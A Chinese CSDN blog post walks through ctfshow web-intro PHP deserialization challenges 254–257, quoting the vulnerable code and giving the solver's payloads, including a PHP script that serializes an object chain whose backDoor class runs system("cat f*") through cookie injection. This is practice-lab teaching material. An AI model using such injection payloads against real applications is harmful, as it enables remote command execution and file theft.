ctfshow web入门 反序列化(254~257详解)

最新推荐文章于 2024-07-17 23:31:19 发布
最新推荐文章于 2024-07-17 23:31:19 发布
阅读量432 收藏 2
点赞数 3
文章标签: php 学习方法
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/WRplayeR/article/details/130020001
版权

  如果想要学php反序列化,要先弄懂php的类与对象,可以自行去php中文网了解,这里不过多赘述。

Web 254

本题并没有使用序列化和反序列化函数

public $username='xxxxxx';
public $password='xxxxxx';


public function login($u,$p){
        if($this->username===$u&&$this->password===$p){
            $this->isVip=true;

$username=$_GET['username'];
$password=$_GET['password'];

从这几段代码可以得知,如果我们GET传入的username和password都为xxxxxx

那么就可以使  isVip = true

if(isset($username) && isset($password)){
    $user = new ctfShowUser();
    if($user->login($username,$password)){
        if($user->checkVip()){
            $user->vipOneKeyGetFlag();

这里可知若isVip = true 就可以得到flag

直接传参即可 : ?username=xxxxxx&password=xxxxxx

Web 255 

if(isset($username) && isset($password)){
    $user = unserialize($_COOKIE['user']);    
    if($user->login($username,$password)){
        if($user->checkVip()){
            $user->vipOneKeyGetFlag();
        }

class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;


public function login($u,$p){
        return $this->username===$u&&$this->password===$p;


public function vipOneKeyGetFlag(){
        if($this->isVip){
            global $flag;

 可知这里反序列化 user COOKIE传参的值,进行验证

且传入的值需要满足username=xxxxxx,password=xxxxxx,isVip=true

 url编码一下

 

 Web256

public function vipOneKeyGetFlag(){
        if($this->isVip){
            global $flag;
            if($this->username!==$this->password){
                    echo "your flag is ".$flag;
              }

 注意这里是   !==  类型相同,但值不同 

做法和上题差不多,这里将password删去一个x(保证类型相同值不同即可)

class ctfshowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip='xxxxxx';
}
$a =new ctfshowUser();
echo urlencode(serialize($a)) //urldenode进行url编码

 

 注意这里的GET传参要与COOKIE传参的值相同,这里cookie中的password为五个x则GET传参的值也为五个x

Web257

 首先要注意的是  __construct()(构造函数,在创建一个对象时调用)

我们在创建ctfShowUser的对象时会调用到这个函数
因此我们要在创建对象时进行命令执行

class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=true;
    public $class='backDoor';

    public function __construct(){
        $this->class=new backDoor();
    }
}

class backDoor{
    public $code='system("cat f*");';
}

$ctfShowUserObj = new ctfShowUser();
$a = serialize($ctfShowUserObj);
echo urlencode($a);

?>

Ctrl+U查看flag 

hhhalloWelt
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
CTFSHOW WEB入门反序列化
Npceer-一位网安初学者的博客
03-01 1168
最近特别懒 等开学在高强度更新其他几篇 不会写太细 反序列化入门文章找Y4爷爷 反序列化web254web255 web254 直接传 username=xxxxxx&password=xxxxxx web255 首先和254一样 传username和password 然后是需要cookie验证VIP身份 抓包构造 注:需要对分号进行url编码 引号好像不用 我当时瞎搞的 ...
CTFshow 反序列化 web257
Kradress的博客
12-19 1865
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified time: 2020-12-02 20:33:07 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); highlight
CTFshow-web入门-php_unserialize-web254-278
最新发布
m0_72655585的博客
07-17 1594
PHP 序列化及反序列化基础反序列化学习笔记[CTF]PHP反序列化总结。
[ctfshow-web]反序列化
nareku的博客
07-25 270
PHP中的魔术变量__sleep()//执行serialize()时,先会调用这个函数__wakeup()//将在反序列化之后立即调用(当反序列化时变量个数与实际不符时绕过)__construct()//当对象被创建时,会触发进行初始化__destruct()//对象被销毁时触发//当一个对象被当作字符串使用时触发__call()//在对象上下文中调用不可访问的方法时触发__callStatic()//在静态上下文中调用不可访问的方法时触发。......
ctfshow web入门——反序列化
m0_74093152的博客
06-25 1694
代码审计,上传username=xxxxxx&password=xxxxxx即可获得flag。
ctfshow-web257(反序列化)
m0_62094846的博客
02-23 1841
__destruct()是PHP面向对象编程的另一个重要的魔法函数,该函数会在类的一个对象被删除时自动调用。 我们可以在该函数中添加一些释放资源的操作,比如关闭文件、关闭数据库链接、清空一个结果集等。其实,__destruct()在日常的编码中并不常见,因为它是非必须的,是类的可选组成部分。通常只是用来完成对象被删除时的清理动作而已。 类中的getinfo()方法通常用于获取一些信息。(java的,php的没找到) <?php /* # -*- coding: utf-8 -*- # ...
深入理解C#序列化与反序列化详解
09-05
C#中的序列化和反序列化是编程过程中用于对象状态持久化或跨进程通信的关键技术。简单来说,序列化就是将对象转换为可存储或可传输的格式,如二进制或XML,而反序列化则是将这些格式还原为原本的对象。在.NET框架中...
java 序列化与反序列化的实例详解
08-29
java 序列化与反序列化的实例详解 Java 序列化与反序列化是 Java 编程语言中的一种机制,允许将 Java 对象转换为字节序列,并将其反序列化回 Java 对象。序列化是指将 Java 对象转换为字节序列的过程,而反序列化是...
详解PHP序列化和反序列化原理
10-18
关于序列化的性能问题,一方面要考虑时间性能,即序列化和反序列化的速度,另一方面要考虑空间性能,即序列化后的数据大小。PHP序列化的时间性能通常不是问题,但空间性能有时需要注意,尤其是当对象很大或包含大量...
Java中对象序列化与反序列化详解
09-03
这个过程被称为序列化,而将字节序列恢复为原来的对象则称为反序列化。本文将深入探讨Java中的对象序列化与反序列化的概念、原理、实现方法以及相关的注意事项。 **一、对象序列化的概念和作用** 对象序列化是将一...
ctfshow web入门反序列化 web254-257
m0_62207170的博客
04-21 587
ctfshow web入门反序列化 web254-257
CTFshow 反序列化wp
会下雪的晴天
01-02 1415
title: CTFshow 反序列化wp date: 2020-12-02 20:03:53 categories: ctfshow link:https://yq1ng.github.io/ 说一些有的没的: payload(有效攻击负载)是包含在你用于一次漏洞利用(exploit)中的ShellCode中的主要功能代码 shellcode(可提权代码) 对于一个漏洞来说,ShellCode就是一个用于某个漏洞的二进制代码框架,有了这个框架你可以在这个ShellCode中包含你需要的Payload.
[WP/WEB/反序列化/未完]CTFshow-web257-268
車鈊的博客
10-12 976
Web257 <?php class ctfShowUser{ private $username='xxxxxx'; private $password='xxxxxx'; private $isVip=false; private $class = 'info'; public function __construct(){ $this->class=new backDoor(); } public function
ctfshow web255 web 256 web257
姜小孩的博客
07-02 1386
目录web255web256附代码 整体的思路和上一题差不多只是多了一句 可以看到unserialize就是反序列化,所以需要我们序列化一些东西,通过cookie的user变量传入,改变这个数据。 这段代码无法让isVip为true,所以我们就需要通过user这个变量改变isVip的值。直接把类拿过来,只有类和变量会被反序列化,其他都可以去掉。 所以参入参数就是拿到flag,债见!!附代码 ​ 这个题的关键点在于username和password不相等,因为都是强比较,所以我们传入
CTFshow刷题日记-WEB-反序列化篇(上,254-263)
Love&Share
09-22 2821
反序列化 web254-简单审计 这个题是搞笑的么???? 按着源码顺序走一遍 ...... $username=$_GET['username']; $password=$_GET['password']; if(isset($username) && isset($password)){ $user = new ctfShowUser(); if($user->login($username,$password)){ if($user->c
ctfshow web入门 反序列化
Sentiment的博客
12-26 1878
web254
渗透学习-CTF篇-web-CTFshow(仅有部分,持续更新中,254-259关))
qq_43696276的博客
03-20 1496
本文将主要介绍CTFshow的关卡攻略,至于基本的原理请参考本人的其他介绍漏洞原理的博客。
CTF之旅WEB篇(3)--ezunser PHP反序列化
shutTD的博客
10-01 1321
总的来说这道题思路还是很清晰的,是算偏易的题了不过新手拿来练手还是可以的逻辑很清晰,建议看完这篇文章后自己再试着做一遍哦!
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

hhhalloWelt

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值